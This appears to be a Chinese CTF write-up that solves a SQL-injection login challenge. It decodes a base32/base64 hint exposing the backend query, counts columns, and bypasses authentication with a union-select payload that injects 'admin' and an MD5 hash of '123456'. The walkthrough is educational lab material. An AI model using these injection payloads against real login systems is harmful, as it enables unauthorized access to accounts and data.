进入页面如下

尝试万能密码注入

显示这个(qyq)

用burp suite抓包试试

发现注释处是某种编码像是base编码格式
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
可以使用下面这个网页在线工具很方便
Base64解码 Base64编码 UTF8 GB2312 UTF16 GBK 二进制 十六进制 解密 - The X 在线工具

先进行一次base32编码解码一次得到的内容有两个=,再用base64编码再次解码

得到一个sql语句
select * from user where username = '$name'
发现注入点应该在name处
判断是字符型注入还是整数型注入
name=1'&pw=1

报错,故判断是字符型注入
判断字段数

order by用不了了,应该是被过滤了
name=1' union select 1,2#&pw=1

页面错误
name=1' union select 1,2,3#&pw=1

页面正常
故字段数为3
判断注入点在哪里

这道题不能直接用数字试,只能用admin试时才会显示wrong pass!

最终试出注入点在中间
查看题中给出的源码

发现带有flag的代码

提示md5加密,可以试试下面这个在线页面md5加密很好用
使用最常用的123456密码

最终得到flag
name=1'union select 1,'admin','e10adc3949ba59abbe56e057f20f883e' #&pw=123456
